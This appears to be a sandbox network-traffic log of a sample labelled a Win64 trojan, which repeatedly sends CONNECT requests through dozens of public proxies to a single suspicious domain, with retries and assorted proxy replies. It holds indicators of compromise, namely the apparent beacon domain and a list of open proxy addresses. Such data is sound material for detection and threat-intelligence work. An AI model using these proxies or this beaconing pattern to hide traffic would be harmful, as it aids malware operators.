                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                847192.168.2.85274777.91.74.77805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.981513977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.189032078 CET154INHTTP/1.1 301 Moved Permanently
                                                                                Location: https://heygirlisheeverythingyouwantedinaman.com:443
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                848192.168.2.852748109.107.181.245328555828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.982651949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                849192.168.2.852788146.59.2.185805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.985050917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                850192.168.2.852701103.146.137.910815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.985155106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                851192.168.2.852618210.211.113.36805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:27.985526085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                852192.168.2.8526945.44.42.115583865828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.001027107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                853192.168.2.852724220.248.70.23790025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.005517960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.694963932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.989972115 CET311INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                854192.168.2.85276280.249.112.162805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.010593891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.263104916 CET343INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 182
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                855192.168.2.852802104.16.108.149805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.035744905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.123073101 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                856192.168.2.852804104.21.31.189805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.035747051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.123243093 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                857192.168.2.852814173.245.49.27805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.036138058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.124119997 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                858192.168.2.85255914.97.48.44805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.038338900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                859192.168.2.852708219.73.88.167805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.050079107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.366494894 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                860192.168.2.852817104.18.161.122805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.050801039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.138283014 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                861192.168.2.852655128.199.196.3149535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.061681986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.882530928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.195048094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.679500103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.491934061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.179527998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.991949081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                862192.168.2.851554103.72.79.65458725828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.076385975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.194911003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.195559978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.195281982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:52.194724083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:04.194711924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:16.196145058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                863192.168.2.851456148.72.215.230469455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.076594114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.194869995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                864192.168.2.852789203.74.125.1888885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.083054066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                865192.168.2.85279998.170.57.24941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.097017050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                866192.168.2.85278743.132.212.77805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.097161055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                867192.168.2.852797177.234.232.10383835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.104408026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.585546970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.272711992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.398156881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.694983006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.046849012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.382585049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.898549080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                868192.168.2.852733196.15.237.19718885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.104880095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                869192.168.2.8527918.213.137.15580345828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.105093002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.406948090 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                870192.168.2.85186668.71.249.153486065828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.105339050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                871192.168.2.852725103.49.202.252805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.109072924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                872192.168.2.85266658.253.210.12288885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.109457970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                873192.168.2.85281972.210.252.13741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.118825912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                874192.168.2.852732113.204.4.142108005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.119548082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                875192.168.2.852812138.117.116.30440095828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.120841980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                876192.168.2.85279539.99.144.43805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.122363091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                877192.168.2.85283382.117.252.143139785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:28.174694061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.323515892 CET407INHTTP/1.0 407 Proxy Authentication Required
                                                                                Proxy-Authenticate: Basic realm="proxy"
                                                                                Proxy-Connection: close
                                                                                Content-type: text/html; charset=utf-8
